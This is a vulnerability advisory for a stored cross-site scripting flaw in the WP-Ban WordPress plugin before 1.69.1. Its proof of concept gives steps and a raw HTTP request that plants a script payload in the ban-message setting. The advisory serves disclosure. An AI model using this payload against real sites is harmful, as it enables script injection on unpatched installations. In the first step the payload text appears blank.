WP-Ban < 1.69.1 - Admin+ Stored XSS

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

PoC

1. Go to the plugin settings and set these fields: In “Banned Referrers”, add “xss” and in “Banned Message”, add “” 2. Go to the website’s homepage using Burp Suite and its Interceptor. 3. Intercept the request, change the “referrer” to “xss” and confirm the request. The alert triggers successfully. The request is: POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 _wpnonce=&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned;_option_reverse_proxy=1&banned;_ips=&banned;_ips_range=&banned;_hosts=&banned;_referers=xss&banned;_user_agents=&banned;_exclude_ips=&banned;_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit;=Save+Changes -video: https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk ======= You need to trigger a ban rule to display the ban message. For example, I set the ban rule to let the referer not equal to xss. The package is like this: http POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 ... _wpnonce=c298ada8b0&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned;_option_reverse_proxy=1&banned;_ips=&banned;_ips_range=&banned;_hosts=&banned;_referers=xss&banned;_user_agents=&banned;_exclude_ips=&banned;_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit;=Save+Changes We set the banned_referers=xss, and the payload in the parameter banned_template_message. Then go to the main page, refresh the page, and set the referer as xss, the vulnerability will be triggered.